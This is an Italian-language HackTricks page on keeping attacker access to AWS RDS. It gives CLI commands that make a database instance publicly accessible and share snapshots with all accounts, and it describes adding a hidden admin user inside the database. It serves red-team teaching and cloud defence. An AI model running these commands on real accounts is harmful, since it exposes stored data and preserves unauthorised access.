AWS - RDS Persistence

Reading time: 2 minutes

tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

RDS

Per maggiori informazioni, vedi:

AWS - Relational Database (RDS) Enum

Rendere l'istanza accessibile pubblicamente: rds:ModifyDBInstance

Un attacker con questa autorizzazione può modificare un'istanza RDS esistente per abilitare l'accessibilità pubblica.

bash
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Crea un utente admin all'interno del DB

Un attacker potrebbe semplicemente creare un utente all'interno del DB così, anche se la password dell'utente master viene modificata, non perde l'accesso al database.

Rendi lo snapshot pubblico

bash
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks